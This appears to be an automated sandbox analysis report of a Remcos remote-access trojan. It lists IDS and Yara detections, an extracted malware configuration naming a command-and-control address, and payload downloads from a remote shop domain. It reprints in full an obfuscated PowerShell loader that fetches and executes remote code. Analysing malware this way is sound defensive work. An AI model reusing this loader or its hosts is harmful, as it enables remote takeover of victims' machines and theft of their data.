';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;Halvraaddent (Fanebrere 'U.i$RikgTryLNsto H.BCouaEncl uk:LivsG,lT Po

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: Registry Key setAuthor: Joe Security: Data: Details: 8E 1F EB C8 62 04 44 BA 00 BA CC CA DB 7F D9 C1 25 1A 7F FA B6 B8 1E 38 9C 1A 30 66 20 5B 2C 3A D0 B5 2A B8 AB 7C 68 DB 3D AA AC 30 D0 05 AE 9C 21 E3 82 90 46 D0 B6 AC 39 2B 2C 94 B1 61 9E C0 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 8064, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-KC5V8F\exepath

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-14T11:06:56.820383+020020365941Malware Command and Control Activity Detected192.168.2.1049976154.216.17.142404TCP
              2024-10-14T11:06:58.098734+020020365941Malware Command and Control Activity Detected192.168.2.1049977154.216.17.142404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-14T11:06:58.044178+020028033043Unknown Traffic192.168.2.1049978178.237.33.5080TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 0000000D.00000002.2588683839.0000000009A0D000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "154.216.17.14:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-KC5V8F", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000D.00000002.2588683839.00000000099F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2588683839.0000000009A0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2588683839.0000000009A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8064, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
              Source: Binary string: ore.pdb source: powershell.exe, 0000000A.00000002.1615492654.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 0000000A.00000002.1643140338.0000000006FA3000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:49976 -> 154.216.17.14:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:49977 -> 154.216.17.14:2404
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 154.216.17.14
              Source: global trafficTCP traffic: 192.168.2.10:49976 -> 154.216.17.14:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.10:49978 -> 178.237.33.50:80
              Source: global trafficHTTP traffic detected: GET /eOYLpCyF/Paasknnelses.u32 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ln6b9.shopConnection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.14
              Source: global trafficHTTP traffic detected: GET /eOYLpCyF/Paasknnelses.u32 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ln6b9.shopConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ZQVTKaPS/GtsQMOeeUIHdk195.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ln6b9.shopCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: msiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: global trafficDNS traffic detected: DNS query: ln6b9.shop
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: wscript.exe, 00000002.00000003.1269707086.000001C35205A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1270000099.000001C35205A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: wscript.exe, 00000002.00000003.1269707086.000001C35205A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1300081099.000001C351FEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1301263131.000001C352000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1301783807.000001C352000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: wscript.exe, 00000002.00000003.1269707086.000001C35205A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: powershell.exe, 0000000A.00000002.1643140338.0000000006F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microB
              Source: powershell.exe, 0000000A.00000002.1643140338.0000000006FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftmB4
              Source: powershell.exe, 00000008.00000002.1447424610.000001B5ECA6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
              Source: wscript.exe, 00000002.00000003.1269707086.000001C35205A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1270000099.000001C35205A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: wscript.exe, 00000002.00000003.1269707086.000001C35205A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1300081099.000001C351FEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1301263131.000001C352000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1301783807.000001C352000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: wscript.exe, 00000002.00000003.1269707086.000001C35205A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: wscript.exe, 00000002.00000003.1300081099.000001C351FEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1301263131.000001C352000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1301783807.000001C352000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: wscript.exe, 00000002.00000003.1300081099.000001C351FEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1287009699.000001C3520A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1301263131.000001C352000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1301783807.000001C352000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1287632062.000001C3520A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1283851081.000001C3520A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 00000002.00000003.1300081099.000001C351FEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1300950781.000001C352045000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1301818193.000001C352048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabg
              Source: wscript.exe, 00000002.00000003.1286829168.000001C353F71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/w
              Source: wscript.exe, 00000002.00000003.1286738829.000001C35205E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1287735795.000001C352086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d32349b469
              Source: powershell.exe, 00000008.00000002.1415702842.000001B5D4835000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1415702842.000001B5D63A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1415702842.000001B5D6052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop
              Source: msiexec.exe, 0000000D.00000002.2588683839.00000000099F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/ZQVTKaPS/GtsQMOeeUIHdk195.bin#
              Source: msiexec.exe, 0000000D.00000002.2588683839.00000000099F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/ZQVTKaPS/GtsQMOeeUIHdk195.binq
              Source: powershell.exe, 00000008.00000002.1415702842.000001B5D4835000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/eOYLpCyF/Paasknnelses.u32P
              Source: powershell.exe, 0000000A.00000002.1618100382.00000000048E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/eOYLpCyF/Paasknnelses.u32XR
              Source: powershell.exe, 00000008.00000002.1441853777.000001B5E4687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1635429037.00000000057FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: wscript.exe, 00000002.00000003.1269707086.000001C35205A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: wscript.exe, 00000002.00000003.1269707086.000001C35205A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1270000099.000001C35205A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: wscript.exe, 00000002.00000003.1269707086.000001C35205A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1300081099.000001C351FEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1301263131.000001C352000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1301783807.000001C352000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: powershell.exe, 0000000A.00000002.1618100382.00000000048E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000008.00000002.1415702842.000001B5D4611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1618100382.0000000004791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000A.00000002.1618100382.00000000048E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: msiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: msiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: msiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: msiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: msiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 00000008.00000002.1415702842.000001B5D4611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000A.00000002.1618100382.0000000004791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 0000000A.00000002.1635429037.00000000057FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000A.00000002.1635429037.00000000057FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000A.00000002.1635429037.00000000057FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000A.00000002.1618100382.00000000048E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000008.00000002.1415702842.000001B5D51BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000008.00000002.1441853777.000001B5E4687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1635429037.00000000057FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: msiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000D.00000002.2588683839.00000000099F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2588683839.0000000009A0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2588683839.0000000009A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8064, type: MEMORYSTR
              Source: msiexec.exeProcess created: 58

              System Summary

              barindex
              Potential malicious VBS script found (suspicious strings)
              Source: Initial file: Call Frostgiant.ShellExecute(Sceneteknikere, Chr(34) & Stradivariusers & Chr(34), "", "", Tiggeren)
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;Halvraadde
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun 